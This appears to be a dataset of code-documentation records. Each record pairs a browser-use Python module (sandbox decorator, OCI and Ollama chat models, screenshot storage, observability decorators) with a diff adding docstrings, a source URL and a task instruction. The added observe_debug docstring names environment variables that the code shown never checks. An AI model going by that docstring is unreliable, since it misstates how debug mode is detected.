# Handle Dict types
if origin is dict:
if not isinstance(data, dict):
return data
if len(args) == 2:
return {_parse_with_type_annotation(k, args[0]): _parse_with_type_annotation(v, args[1]) for k, v in data.items()}
return data
# Handle Enum types
if inspect.isclass(annotation) and issubclass(annotation, enum.Enum):
if isinstance(data, str):
try:
return annotation[data] # By name
except KeyError:
return annotation(data) # By value
return annotation(data) # By value
# Handle Pydantic v2 - use model_construct to skip validation and recursively parse nested fields
# Get the actual class (unwrap generic if needed)
# For Pydantic generics, get_origin() returns None, so check __pydantic_generic_metadata__ first
pydantic_generic_meta = getattr(annotation, '__pydantic_generic_metadata__', None)
if pydantic_generic_meta and pydantic_generic_meta.get('origin'):
actual_class = pydantic_generic_meta['origin']
generic_args = pydantic_generic_meta.get('args', ())
else:
actual_class = get_origin(annotation) or annotation
generic_args = get_args(annotation)
if hasattr(actual_class, 'model_construct'):
if not isinstance(data, dict):
return data
# Recursively parse each field according to its type annotation
if hasattr(actual_class, 'model_fields'):
parsed_fields = {}
for field_name, field_info in actual_class.model_fields.items():
if field_name in data:
field_annotation = field_info.annotation
parsed_fields[field_name] = _parse_with_type_annotation(data[field_name], field_annotation)
result = actual_class.model_construct(**parsed_fields)
# Special handling for AgentHistoryList: extract and set _output_model_schema from generic type parameter
if actual_class.__name__ == 'AgentHistoryList' and generic_args:
output_model_schema = generic_args[0]
# Only set if it's an actual model class, not a TypeVar
if inspect.isclass(output_model_schema) and hasattr(output_model_schema, 'model_validate_json'):
result._output_model_schema = output_model_schema
return result
# Fallback if model_fields not available
return actual_class.model_construct(**data)
# Handle Pydantic v1 - use construct to skip validation and recursively parse nested fields
if hasattr(annotation, 'construct'):
if not isinstance(data, dict):
return data
# Recursively parse each field if __fields__ is available
if hasattr(annotation, '__fields__'):
parsed_fields = {}
for field_name, field_obj in annotation.__fields__.items():
if field_name in data:
field_annotation = field_obj.outer_type_
parsed_fields[field_name] = _parse_with_type_annotation(data[field_name], field_annotation)
return annotation.construct(**parsed_fields)
# Fallback if __fields__ not available
return annotation.construct(**data)
# Handle dataclasses
if dataclasses.is_dataclass(annotation) and isinstance(data, dict):
# Get field type annotations
field_types = {f.name: f.type for f in dataclasses.fields(annotation)}
# Recursively parse each field
parsed_fields = {}
for field_name, field_type in field_types.items():
if field_name in data:
parsed_fields[field_name] = _parse_with_type_annotation(data[field_name], field_type)
return cast(type[Any], annotation)(**parsed_fields)
# Handle regular classes
if inspect.isclass(annotation) and isinstance(data, dict):
try:
return annotation(**data)
except Exception:
pass
return data
except Exception:
return data | --- +++ @@ -33,6 +33,7 @@
def get_terminal_width() -> int:
+ """Get terminal width, default to 80 if unable to detect"""
try:
return os.get_terminal_size().columns
except (AttributeError, OSError):
@@ -40,12 +41,14 @@
async def _call_callback(callback: Callable[..., Any], *args: Any) -> None:
+ """Call a callback that can be either sync or async"""
result = callback(*args)
if asyncio.iscoroutine(result):
await result
def _get_function_source_without_decorator(func: Callable) -> str:
+ """Get function source code with decorator removed"""
source = inspect.getsource(func)
source = textwrap.dedent(source)
@@ -60,12 +63,14 @@
def _get_imports_used_in_function(func: Callable) -> str:
+ """Extract only imports that are referenced in the function body or type annotations"""
# Get all names referenced in the function
code = func.__code__
referenced_names = set(code.co_names)
# Also get names from type annotations (recursively for complex types like Union, Literal, etc.)
def extract_type_names(annotation):
+ """Recursively extract all type names from annotation"""
if annotation is None or annotation == inspect.Parameter.empty:
return
@@ -152,6 +157,16 @@
def _extract_all_params(func: Callable, args: tuple, kwargs: dict) -> dict[str, Any]:
+ """Extract all parameters including explicit params and closure variables
+
+ Args:
+ func: The function being decorated
+ args: Positional arguments passed to the function
+ kwargs: Keyword arguments passed to the function
+
+ Returns:
+ Dictionary of all parameters {name: value}
+ """
sig = inspect.signature(func)
bound_args = sig.bind_partial(*args, **kwargs)
bound_args.apply_defaults()
@@ -215,6 +230,43 @@ on_error: Callable[[ErrorData], None] | Callable[[ErrorData], Coroutine[Any, Any, None]] | None = None,
**env_vars: str,
) -> Callable[[Callable[Concatenate['BrowserSession', P], Coroutine[Any, Any, T]]], Callable[P, Coroutine[Any, Any, T]]]:
+ """Decorator to execute browser automation code in a sandbox environment.
+
+ The decorated function MUST have 'browser: Browser' as its first parameter.
+ The browser parameter will be automatically injected - do NOT pass it when calling the decorated function.
+ All other parameters (explicit or from closure) will be captured and sent via cloudpickle.
+
+ Args:
+ BROWSER_USE_API_KEY: API key (defaults to BROWSER_USE_API_KEY env var)
+ cloud_profile_id: The ID of the profile to use for the browser session
+ cloud_proxy_country_code: Country code for proxy location (e.g., 'us', 'uk', 'fr')
+ cloud_timeout: The timeout for the browser session in minutes (max 240 = 4 hours)
+ server_url: Sandbox server URL (defaults to https://sandbox.api.browser-use.com/sandbox-stream)
+ log_level: Logging level (INFO, DEBUG, WARNING, ERROR)
+ quiet: Suppress console output
+ headers: Additional HTTP headers to send with the request
+ on_browser_created: Callback when browser is created
+ on_instance_ready: Callback when instance is ready
+ on_log: Callback for log events
+ on_result: Callback when execution completes
+ on_error: Callback for errors
+ **env_vars: Additional environment variables
+
+ Example:
+ @sandbox()
+ async def task(browser: Browser, url: str, max_steps: int) -> str:
+ agent = Agent(task=url, browser=browser)
+ await agent.run(max_steps=max_steps)
+ return "done"
+
+ # Call with:
+ result = await task(url="https://example.com", max_steps=10)
+
+ # With cloud parameters:
+ @sandbox(cloud_proxy_country_code='us', cloud_timeout=60)
+ async def task_with_proxy(browser: Browser) -> str:
+ ...
+ """
def decorator(
func: Callable[Concatenate['BrowserSession', P], Coroutine[Any, Any, T]],
@@ -479,6 +531,12 @@
def _parse_with_type_annotation(data: Any, annotation: Any) -> Any:
+ """Parse data with type annotation without validation, recursively handling nested types
+
+ This function reconstructs Pydantic models, dataclasses, and enums from JSON dicts
+ without running validation logic. It recursively parses nested fields to ensure
+ complete type fidelity.
+ """
try:
if data is None:
return None
@@ -608,4 +666,4 @@ return data
except Exception:
- return data+ return data
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/sandbox/sandbox.py |
Add documentation for all methods |
import asyncio
import json
from dataclasses import dataclass
from typing import Any, TypeVar, overload
import oci
from oci.generative_ai_inference import GenerativeAiInferenceClient
from oci.generative_ai_inference.models import (
BaseChatRequest,
ChatDetails,
CohereChatRequest,
GenericChatRequest,
OnDemandServingMode,
)
from pydantic import BaseModel
from browser_use.llm.base import BaseChatModel
from browser_use.llm.exceptions import ModelProviderError, ModelRateLimitError
from browser_use.llm.messages import BaseMessage
from browser_use.llm.schema import SchemaOptimizer
from browser_use.llm.views import ChatInvokeCompletion, ChatInvokeUsage
from .serializer import OCIRawMessageSerializer
T = TypeVar('T', bound=BaseModel)
@dataclass
class ChatOCIRaw(BaseChatModel):
# Model configuration
model_id: str
service_endpoint: str
compartment_id: str
provider: str = 'meta'
# Model parameters
temperature: float | None = 1.0
max_tokens: int | None = 600
frequency_penalty: float | None = 0.0
presence_penalty: float | None = 0.0
top_p: float | None = 0.75
top_k: int | None = 0 # Used by Cohere models
# Authentication
auth_type: str = 'API_KEY'
auth_profile: str = 'DEFAULT'
# Client configuration
timeout: float = 60.0
# Static properties
@property
def provider_name(self) -> str:
return 'oci-raw'
@property
def name(self) -> str:
# Return a shorter name for telemetry (max 100 chars)
if len(self.model_id) > 90:
# Extract the model name from the OCID
parts = self.model_id.split('.')
if len(parts) >= 4:
return f'oci-{self.provider}-{parts[3]}' # e.g., "oci-meta-us-chicago-1"
else:
return f'oci-{self.provider}-model'
return self.model_id
@property
def model(self) -> str:
return self.model_id
@property
def model_name(self) -> str:
# Override for telemetry - return shorter name (max 100 chars)
if len(self.model_id) > 90:
# Extract the model name from the OCID
parts = self.model_id.split('.')
if len(parts) >= 4:
return f'oci-{self.provider}-{parts[3]}' # e.g., "oci-meta-us-chicago-1"
else:
return f'oci-{self.provider}-model'
return self.model_id
def _uses_cohere_format(self) -> bool:
return self.provider.lower() == 'cohere'
def _get_supported_parameters(self) -> dict[str, bool]:
provider = self.provider.lower()
if provider == 'meta':
return {
'temperature': True,
'max_tokens': True,
'frequency_penalty': True,
'presence_penalty': True,
'top_p': True,
'top_k': False,
}
elif provider == 'cohere':
return {
'temperature': True,
'max_tokens': True,
'frequency_penalty': True,
'presence_penalty': False,
'top_p': True,
'top_k': True,
}
elif provider == 'xai':
return {
'temperature': True,
'max_tokens': True,
'frequency_penalty': False,
'presence_penalty': False,
'top_p': True,
'top_k': True,
}
else:
# Default: assume all parameters are supported
return {
'temperature': True,
'max_tokens': True,
'frequency_penalty': True,
'presence_penalty': True,
'top_p': True,
'top_k': True,
}
def _get_oci_client(self) -> GenerativeAiInferenceClient:
if not hasattr(self, '_client'):
# Configure OCI client based on auth_type (following your working example)
if self.auth_type == 'API_KEY':
config = oci.config.from_file('~/.oci/config', self.auth_profile)
self._client = GenerativeAiInferenceClient(
config=config,
service_endpoint=self.service_endpoint,
retry_strategy=oci.retry.NoneRetryStrategy(),
timeout=(10, 240), # Following your working example
)
elif self.auth_type == 'INSTANCE_PRINCIPAL':
config = {}
signer = oci.auth.signers.InstancePrincipalsSecurityTokenSigner()
self._client = GenerativeAiInferenceClient(
config=config,
signer=signer,
service_endpoint=self.service_endpoint,
retry_strategy=oci.retry.NoneRetryStrategy(),
timeout=(10, 240),
)
elif self.auth_type == 'RESOURCE_PRINCIPAL':
config = {}
signer = oci.auth.signers.get_resource_principals_signer()
self._client = GenerativeAiInferenceClient(
config=config,
signer=signer,
service_endpoint=self.service_endpoint,
retry_strategy=oci.retry.NoneRetryStrategy(),
timeout=(10, 240),
)
else:
# Fallback to API_KEY
config = oci.config.from_file('~/.oci/config', self.auth_profile)
self._client = GenerativeAiInferenceClient(
config=config,
service_endpoint=self.service_endpoint,
retry_strategy=oci.retry.NoneRetryStrategy(),
timeout=(10, 240),
)
return self._client
def _extract_usage(self, response) -> ChatInvokeUsage | None:
try:
# The response is the direct OCI response object, not a dict
if hasattr(response, 'data') and hasattr(response.data, 'chat_response'):
chat_response = response.data.chat_response
if hasattr(chat_response, 'usage'):
usage = chat_response.usage
return ChatInvokeUsage(
prompt_tokens=getattr(usage, 'prompt_tokens', 0),
prompt_cached_tokens=None,
prompt_cache_creation_tokens=None,
prompt_image_tokens=None,
completion_tokens=getattr(usage, 'completion_tokens', 0),
total_tokens=getattr(usage, 'total_tokens', 0),
)
return None
except Exception:
return None
def _extract_content(self, response) -> str:
try:
# The response is the direct OCI response object, not a dict
if not hasattr(response, 'data'):
raise ModelProviderError(message='Invalid response format: no data attribute', status_code=500, model=self.name)
chat_response = response.data.chat_response
# Handle different response types based on provider
if hasattr(chat_response, 'text'):
# Cohere response format - has direct text attribute
return chat_response.text or ''
elif hasattr(chat_response, 'choices') and chat_response.choices:
# Generic response format - has choices array (Meta, xAI)
choice = chat_response.choices[0]
message = choice.message
content_parts = message.content
# Extract text from content parts
text_parts = []
for part in content_parts:
if hasattr(part, 'text'):
text_parts.append(part.text)
return '\n'.join(text_parts) if text_parts else ''
else:
raise ModelProviderError(
message=f'Unsupported response format: {type(chat_response).__name__}', status_code=500, model=self.name
)
except Exception as e:
raise ModelProviderError(
message=f'Failed to extract content from response: {str(e)}', status_code=500, model=self.name
) from e
async def _make_request(self, messages: list[BaseMessage]):
# Create chat request based on provider type
if self._uses_cohere_format():
# Cohere models use CohereChatRequest with single message string
message_text = OCIRawMessageSerializer.serialize_messages_for_cohere(messages)
chat_request = CohereChatRequest()
chat_request.message = message_text
chat_request.max_tokens = self.max_tokens
chat_request.temperature = self.temperature
chat_request.frequency_penalty = self.frequency_penalty
chat_request.top_p = self.top_p
chat_request.top_k = self.top_k
else:
# Meta, xAI and other models use GenericChatRequest with messages array
oci_messages = OCIRawMessageSerializer.serialize_messages(messages)
chat_request = GenericChatRequest()
chat_request.api_format = BaseChatRequest.API_FORMAT_GENERIC
chat_request.messages = oci_messages
chat_request.max_tokens = self.max_tokens
chat_request.temperature = self.temperature
chat_request.top_p = self.top_p
# Provider-specific parameters
if self.provider.lower() == 'meta':
# Meta models support frequency_penalty and presence_penalty
chat_request.frequency_penalty = self.frequency_penalty
chat_request.presence_penalty = self.presence_penalty
elif self.provider.lower() == 'xai':
# xAI models support top_k but not frequency_penalty or presence_penalty
chat_request.top_k = self.top_k
else:
# Default: include all parameters for unknown providers
chat_request.frequency_penalty = self.frequency_penalty
chat_request.presence_penalty = self.presence_penalty
# Create serving mode
serving_mode = OnDemandServingMode(model_id=self.model_id)
# Create chat details
chat_details = ChatDetails()
chat_details.serving_mode = serving_mode
chat_details.chat_request = chat_request
chat_details.compartment_id = self.compartment_id
# Make the request in a thread to avoid blocking
def _sync_request():
try:
client = self._get_oci_client()
response = client.chat(chat_details)
return response # Return the raw response object
except Exception as e:
# Handle OCI-specific exceptions
status_code = getattr(e, 'status', 500)
if status_code == 429:
raise ModelRateLimitError(message=f'Rate limit exceeded: {str(e)}', model=self.name) from e
else:
raise ModelProviderError(message=str(e), status_code=status_code, model=self.name) from e
# Run in thread pool to make it async
loop = asyncio.get_event_loop()
return await loop.run_in_executor(None, _sync_request)
@overload
async def ainvoke(
self, messages: list[BaseMessage], output_format: None = None, **kwargs: Any
) -> ChatInvokeCompletion[str]: ...
@overload
async def ainvoke(self, messages: list[BaseMessage], output_format: type[T], **kwargs: Any) -> ChatInvokeCompletion[T]: ...
async def ainvoke(
self, messages: list[BaseMessage], output_format: type[T] | None = None, **kwargs: Any
) -> ChatInvokeCompletion[T] | ChatInvokeCompletion[str]:
try:
if output_format is None:
# Return string response
response = await self._make_request(messages)
content = self._extract_content(response)
usage = self._extract_usage(response)
return ChatInvokeCompletion(
completion=content,
usage=usage,
)
else:
# For structured output, add JSON schema instructions
optimized_schema = SchemaOptimizer.create_optimized_json_schema(output_format)
# Add JSON schema instruction to messages
system_instruction = f"""
You must respond with ONLY a valid JSON object that matches this exact schema:
{json.dumps(optimized_schema, indent=2)}
IMPORTANT:
- Your response must be ONLY the JSON object, no additional text
- The JSON must be valid and parseable
- All required fields must be present
- No extra fields are allowed
- Use proper JSON syntax with double quotes
"""
# Clone messages and add system instruction
modified_messages = messages.copy()
# Add or modify system message
from browser_use.llm.messages import SystemMessage
if modified_messages and hasattr(modified_messages[0], 'role') and modified_messages[0].role == 'system':
# Modify existing system message
existing_content = modified_messages[0].content
if isinstance(existing_content, str):
modified_messages[0].content = existing_content + '\n\n' + system_instruction
else:
# Handle list content
modified_messages[0].content = str(existing_content) + '\n\n' + system_instruction
else:
# Insert new system message at the beginning
modified_messages.insert(0, SystemMessage(content=system_instruction))
response = await self._make_request(modified_messages)
response_text = self._extract_content(response)
# Clean and parse the JSON response
try:
# Clean the response text
cleaned_text = response_text.strip()
# Remove markdown code blocks if present
if cleaned_text.startswith('```json'):
cleaned_text = cleaned_text[7:]
if cleaned_text.startswith('```'):
cleaned_text = cleaned_text[3:]
if cleaned_text.endswith('```'):
cleaned_text = cleaned_text[:-3]
cleaned_text = cleaned_text.strip()
# Try to find JSON object in the response
if not cleaned_text.startswith('{'):
start_idx = cleaned_text.find('{')
end_idx = cleaned_text.rfind('}')
if start_idx != -1 and end_idx != -1 and end_idx > start_idx:
cleaned_text = cleaned_text[start_idx : end_idx + 1]
# Parse the JSON
parsed_data = json.loads(cleaned_text)
parsed = output_format.model_validate(parsed_data)
usage = self._extract_usage(response)
return ChatInvokeCompletion(
completion=parsed,
usage=usage,
)
except (json.JSONDecodeError, ValueError) as e:
raise ModelProviderError(
message=f'Failed to parse structured output: {str(e)}. Response was: {response_text[:200]}...',
status_code=500,
model=self.name,
) from e
except ModelRateLimitError:
# Re-raise rate limit errors as-is
raise
except ModelProviderError:
# Re-raise provider errors as-is
raise
except Exception as e:
# Handle any other exceptions
raise ModelProviderError(
message=f'Unexpected error: {str(e)}',
status_code=500,
model=self.name,
) from e | --- +++ @@ -1,3 +1,9 @@+"""
+OCI Raw API chat model integration for browser-use.
+
+This module provides direct integration with Oracle Cloud Infrastructure's
+Generative AI service using raw API calls without Langchain dependencies.
+"""
import asyncio
import json
@@ -28,6 +34,27 @@
@dataclass
class ChatOCIRaw(BaseChatModel):
+ """
+ A direct OCI Raw API integration for browser-use that bypasses Langchain.
+
+ This class provides a browser-use compatible interface for OCI GenAI models
+ using direct API calls to Oracle Cloud Infrastructure.
+
+ Args:
+ model_id: The OCI GenAI model OCID
+ service_endpoint: The OCI service endpoint URL
+ compartment_id: The OCI compartment OCID
+ provider: The model provider (e.g., "meta", "cohere", "xai")
+ temperature: Temperature for response generation (0.0-2.0) - supported by all providers
+ max_tokens: Maximum tokens in response - supported by all providers
+ frequency_penalty: Frequency penalty for response generation - supported by Meta and Cohere only
+ presence_penalty: Presence penalty for response generation - supported by Meta only
+ top_p: Top-p sampling parameter - supported by all providers
+ top_k: Top-k sampling parameter - supported by Cohere and xAI only
+ auth_type: Authentication type (e.g., "API_KEY")
+ auth_profile: Authentication profile name
+ timeout: Request timeout in seconds
+ """
# Model configuration
model_id: str
@@ -84,9 +111,11 @@ return self.model_id
def _uses_cohere_format(self) -> bool:
+ """Check if the provider uses Cohere chat request format."""
return self.provider.lower() == 'cohere'
def _get_supported_parameters(self) -> dict[str, bool]:
+ """Get which parameters are supported by the current provider."""
provider = self.provider.lower()
if provider == 'meta':
return {
@@ -127,6 +156,7 @@ }
def _get_oci_client(self) -> GenerativeAiInferenceClient:
+ """Get the OCI GenerativeAiInferenceClient following your working example."""
if not hasattr(self, '_client'):
# Configure OCI client based on auth_type (following your working example)
if self.auth_type == 'API_KEY':
@@ -170,6 +200,7 @@ return self._client
def _extract_usage(self, response) -> ChatInvokeUsage | None:
+ """Extract usage information from OCI response."""
try:
# The response is the direct OCI response object, not a dict
if hasattr(response, 'data') and hasattr(response.data, 'chat_response'):
@@ -189,6 +220,7 @@ return None
def _extract_content(self, response) -> str:
+ """Extract text content from OCI response."""
try:
# The response is the direct OCI response object, not a dict
if not hasattr(response, 'data'):
@@ -224,6 +256,7 @@ ) from e
async def _make_request(self, messages: list[BaseMessage]):
+ """Make async request to OCI API using proper OCI SDK models."""
# Create chat request based on provider type
if self._uses_cohere_format():
@@ -299,6 +332,16 @@ async def ainvoke(
self, messages: list[BaseMessage], output_format: type[T] | None = None, **kwargs: Any
) -> ChatInvokeCompletion[T] | ChatInvokeCompletion[str]:
+ """
+ Invoke the OCI GenAI model with the given messages using raw API.
+
+ Args:
+ messages: List of chat messages
+ output_format: Optional Pydantic model class for structured output
+
+ Returns:
+ Either a string response or an instance of output_format
+ """
try:
if output_format is None:
# Return string response
@@ -399,4 +442,4 @@ message=f'Unexpected error: {str(e)}',
status_code=500,
model=self.name,
- ) from e+ ) from e
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/oci_raw/chat.py |
Document helper functions with docstrings |
import base64
from pathlib import Path
import anyio
from browser_use.observability import observe_debug
class ScreenshotService:
def __init__(self, agent_directory: str | Path):
self.agent_directory = Path(agent_directory) if isinstance(agent_directory, str) else agent_directory
# Create screenshots subdirectory
self.screenshots_dir = self.agent_directory / 'screenshots'
self.screenshots_dir.mkdir(parents=True, exist_ok=True)
@observe_debug(ignore_input=True, ignore_output=True, name='store_screenshot')
async def store_screenshot(self, screenshot_b64: str, step_number: int) -> str:
screenshot_filename = f'step_{step_number}.png'
screenshot_path = self.screenshots_dir / screenshot_filename
# Decode base64 and save to disk
screenshot_data = base64.b64decode(screenshot_b64)
async with await anyio.open_file(screenshot_path, 'wb') as f:
await f.write(screenshot_data)
return str(screenshot_path)
@observe_debug(ignore_input=True, ignore_output=True, name='get_screenshot_from_disk')
async def get_screenshot(self, screenshot_path: str) -> str | None:
if not screenshot_path:
return None
path = Path(screenshot_path)
if not path.exists():
return None
# Load from disk and encode to base64
async with await anyio.open_file(path, 'rb') as f:
screenshot_data = await f.read()
return base64.b64encode(screenshot_data).decode('utf-8') | --- +++ @@ -1,3 +1,6 @@+"""
+Screenshot storage service for browser-use agents.
+"""
import base64
from pathlib import Path
@@ -8,8 +11,10 @@
class ScreenshotService:
+ """Simple screenshot storage service that saves screenshots to disk"""
def __init__(self, agent_directory: str | Path):
+ """Initialize with agent directory path"""
self.agent_directory = Path(agent_directory) if isinstance(agent_directory, str) else agent_directory
# Create screenshots subdirectory
@@ -18,6 +23,7 @@
@observe_debug(ignore_input=True, ignore_output=True, name='store_screenshot')
async def store_screenshot(self, screenshot_b64: str, step_number: int) -> str:
+ """Store screenshot to disk and return the full path as string"""
screenshot_filename = f'step_{step_number}.png'
screenshot_path = self.screenshots_dir / screenshot_filename
@@ -31,6 +37,7 @@
@observe_debug(ignore_input=True, ignore_output=True, name='get_screenshot_from_disk')
async def get_screenshot(self, screenshot_path: str) -> str | None:
+ """Load screenshot from disk path and return as base64"""
if not screenshot_path:
return None
@@ -42,4 +49,4 @@ async with await anyio.open_file(path, 'rb') as f:
screenshot_data = await f.read()
- return base64.b64encode(screenshot_data).decode('utf-8')+ return base64.b64encode(screenshot_data).decode('utf-8')
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/screenshots/service.py |
Include argument descriptions in docstrings | from collections.abc import Mapping
from dataclasses import dataclass
from typing import Any, TypeVar, overload
import httpx
from ollama import AsyncClient as OllamaAsyncClient
from ollama import Options
from pydantic import BaseModel
from browser_use.llm.base import BaseChatModel
from browser_use.llm.exceptions import ModelProviderError
from browser_use.llm.messages import BaseMessage
from browser_use.llm.ollama.serializer import OllamaMessageSerializer
from browser_use.llm.views import ChatInvokeCompletion
T = TypeVar('T', bound=BaseModel)
@dataclass
class ChatOllama(BaseChatModel):
model: str
# # Model params
# TODO (matic): Why is this commented out?
# temperature: float | None = None
# Client initialization parameters
host: str | None = None
timeout: float | httpx.Timeout | None = None
client_params: dict[str, Any] | None = None
ollama_options: Mapping[str, Any] | Options | None = None
# Static
@property
def provider(self) -> str:
return 'ollama'
def _get_client_params(self) -> dict[str, Any]:
return {
'host': self.host,
'timeout': self.timeout,
'client_params': self.client_params,
}
def get_client(self) -> OllamaAsyncClient:
return OllamaAsyncClient(host=self.host, timeout=self.timeout, **self.client_params or {})
@property
def name(self) -> str:
return self.model
@overload
async def ainvoke(
self, messages: list[BaseMessage], output_format: None = None, **kwargs: Any
) -> ChatInvokeCompletion[str]: ...
@overload
async def ainvoke(self, messages: list[BaseMessage], output_format: type[T], **kwargs: Any) -> ChatInvokeCompletion[T]: ...
async def ainvoke(
self, messages: list[BaseMessage], output_format: type[T] | None = None, **kwargs: Any
) -> ChatInvokeCompletion[T] | ChatInvokeCompletion[str]:
ollama_messages = OllamaMessageSerializer.serialize_messages(messages)
try:
if output_format is None:
response = await self.get_client().chat(
model=self.model,
messages=ollama_messages,
options=self.ollama_options,
)
return ChatInvokeCompletion(completion=response.message.content or '', usage=None)
else:
schema = output_format.model_json_schema()
response = await self.get_client().chat(
model=self.model,
messages=ollama_messages,
format=schema,
options=self.ollama_options,
)
completion = response.message.content or ''
if output_format is not None:
completion = output_format.model_validate_json(completion)
return ChatInvokeCompletion(completion=completion, usage=None)
except Exception as e:
raise ModelProviderError(message=str(e), model=self.name) from e | --- +++ @@ -18,6 +18,9 @@
@dataclass
class ChatOllama(BaseChatModel):
+ """
+ A wrapper around Ollama's chat model.
+ """
model: str
@@ -37,6 +40,7 @@ return 'ollama'
def _get_client_params(self) -> dict[str, Any]:
+ """Prepare client parameters dictionary."""
return {
'host': self.host,
'timeout': self.timeout,
@@ -44,6 +48,9 @@ }
def get_client(self) -> OllamaAsyncClient:
+ """
+ Returns an OllamaAsyncClient client.
+ """
return OllamaAsyncClient(host=self.host, timeout=self.timeout, **self.client_params or {})
@property
@@ -89,4 +96,4 @@ return ChatInvokeCompletion(completion=completion, usage=None)
except Exception as e:
- raise ModelProviderError(message=str(e), model=self.name) from e+ raise ModelProviderError(message=str(e), model=self.name) from e
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/ollama/chat.py |
Generate descriptive docstrings automatically | # @file purpose: Observability module for browser-use that handles optional lmnr integration with debug mode support
import logging
import os
from collections.abc import Callable
from functools import wraps
from typing import Any, Literal, TypeVar, cast
logger = logging.getLogger(__name__)
from dotenv import load_dotenv
load_dotenv()
# Type definitions
F = TypeVar('F', bound=Callable[..., Any])
# Check if we're in debug mode
def _is_debug_mode() -> bool:
lmnr_debug_mode = os.getenv('LMNR_LOGGING_LEVEL', '').lower()
if lmnr_debug_mode == 'debug':
# logger.info('Debug mode is enabled for observability')
return True
# logger.info('Debug mode is disabled for observability')
return False
# Try to import lmnr observe
_LMNR_AVAILABLE = False
_lmnr_observe = None
try:
from lmnr import observe as _lmnr_observe # type: ignore
if os.environ.get('BROWSER_USE_VERBOSE_OBSERVABILITY', 'false').lower() == 'true':
logger.debug('Lmnr is available for observability')
_LMNR_AVAILABLE = True
except ImportError:
if os.environ.get('BROWSER_USE_VERBOSE_OBSERVABILITY', 'false').lower() == 'true':
logger.debug('Lmnr is not available for observability')
_LMNR_AVAILABLE = False
def _create_no_op_decorator(
name: str | None = None,
ignore_input: bool = False,
ignore_output: bool = False,
metadata: dict[str, Any] | None = None,
**kwargs: Any,
) -> Callable[[F], F]:
import asyncio
def decorator(func: F) -> F:
if asyncio.iscoroutinefunction(func):
@wraps(func)
async def async_wrapper(*args, **kwargs):
return await func(*args, **kwargs)
return cast(F, async_wrapper)
else:
@wraps(func)
def sync_wrapper(*args, **kwargs):
return func(*args, **kwargs)
return cast(F, sync_wrapper)
return decorator
def observe(
name: str | None = None,
ignore_input: bool = False,
ignore_output: bool = False,
metadata: dict[str, Any] | None = None,
span_type: Literal['DEFAULT', 'LLM', 'TOOL'] = 'DEFAULT',
**kwargs: Any,
) -> Callable[[F], F]:
kwargs = {
'name': name,
'ignore_input': ignore_input,
'ignore_output': ignore_output,
'metadata': metadata,
'span_type': span_type,
'tags': ['observe', 'observe_debug'], # important: tags need to be created on laminar first
**kwargs,
}
if _LMNR_AVAILABLE and _lmnr_observe:
# Use the real lmnr observe decorator
return cast(Callable[[F], F], _lmnr_observe(**kwargs))
else:
# Use no-op decorator
return _create_no_op_decorator(**kwargs)
def observe_debug(
name: str | None = None,
ignore_input: bool = False,
ignore_output: bool = False,
metadata: dict[str, Any] | None = None,
span_type: Literal['DEFAULT', 'LLM', 'TOOL'] = 'DEFAULT',
**kwargs: Any,
) -> Callable[[F], F]:
kwargs = {
'name': name,
'ignore_input': ignore_input,
'ignore_output': ignore_output,
'metadata': metadata,
'span_type': span_type,
'tags': ['observe_debug'], # important: tags need to be created on laminar first
**kwargs,
}
if _LMNR_AVAILABLE and _lmnr_observe and _is_debug_mode():
# Use the real lmnr observe decorator only in debug mode
return cast(Callable[[F], F], _lmnr_observe(**kwargs))
else:
# Use no-op decorator (either not in debug mode or lmnr not available)
return _create_no_op_decorator(**kwargs)
# Convenience functions for checking availability and debug status
def is_lmnr_available() -> bool:
return _LMNR_AVAILABLE
def is_debug_mode() -> bool:
return _is_debug_mode()
def get_observability_status() -> dict[str, bool]:
return {
'lmnr_available': _LMNR_AVAILABLE,
'debug_mode': _is_debug_mode(),
'observe_active': _LMNR_AVAILABLE,
'observe_debug_active': _LMNR_AVAILABLE and _is_debug_mode(),
} | --- +++ @@ -1,4 +1,16 @@ # @file purpose: Observability module for browser-use that handles optional lmnr integration with debug mode support
+"""
+Observability module for browser-use
+
+This module provides observability decorators that optionally integrate with lmnr (Laminar) for tracing.
+If lmnr is not installed, it provides no-op wrappers that accept the same parameters.
+
+Features:
+- Optional lmnr integration - works with or without lmnr installed
+- Debug mode support - observe_debug only traces when in debug mode
+- Full parameter compatibility with lmnr observe decorator
+- No-op fallbacks when lmnr is unavailable
+"""
import logging
import os
@@ -17,6 +29,7 @@
# Check if we're in debug mode
def _is_debug_mode() -> bool:
+ """Check if we're in debug mode based on environment variables or logging level."""
lmnr_debug_mode = os.getenv('LMNR_LOGGING_LEVEL', '').lower()
if lmnr_debug_mode == 'debug':
@@ -49,6 +62,7 @@ metadata: dict[str, Any] | None = None,
**kwargs: Any,
) -> Callable[[F], F]:
+ """Create a no-op decorator that accepts all lmnr observe parameters but does nothing."""
import asyncio
def decorator(func: F) -> F:
@@ -78,6 +92,27 @@ span_type: Literal['DEFAULT', 'LLM', 'TOOL'] = 'DEFAULT',
**kwargs: Any,
) -> Callable[[F], F]:
+ """
+ Observability decorator that traces function execution when lmnr is available.
+
+ This decorator will use lmnr's observe decorator if lmnr is installed,
+ otherwise it will be a no-op that accepts the same parameters.
+
+ Args:
+ name: Name of the span/trace
+ ignore_input: Whether to ignore function input parameters in tracing
+ ignore_output: Whether to ignore function output in tracing
+ metadata: Additional metadata to attach to the span
+ **kwargs: Additional parameters passed to lmnr observe
+
+ Returns:
+ Decorated function that may be traced depending on lmnr availability
+
+ Example:
+ @observe(name="my_function", metadata={"version": "1.0"})
+ def my_function(param1, param2):
+ return param1 + param2
+ """
kwargs = {
'name': name,
'ignore_input': ignore_input,
@@ -104,6 +139,32 @@ span_type: Literal['DEFAULT', 'LLM', 'TOOL'] = 'DEFAULT',
**kwargs: Any,
) -> Callable[[F], F]:
+ """
+ Debug-only observability decorator that only traces when in debug mode.
+
+ This decorator will use lmnr's observe decorator if both lmnr is installed
+ AND we're in debug mode, otherwise it will be a no-op.
+
+ Debug mode is determined by:
+ - DEBUG environment variable set to 1/true/yes/on
+ - BROWSER_USE_DEBUG environment variable set to 1/true/yes/on
+ - Root logging level set to DEBUG or lower
+
+ Args:
+ name: Name of the span/trace
+ ignore_input: Whether to ignore function input parameters in tracing
+ ignore_output: Whether to ignore function output in tracing
+ metadata: Additional metadata to attach to the span
+ **kwargs: Additional parameters passed to lmnr observe
+
+ Returns:
+ Decorated function that may be traced only in debug mode
+
+ Example:
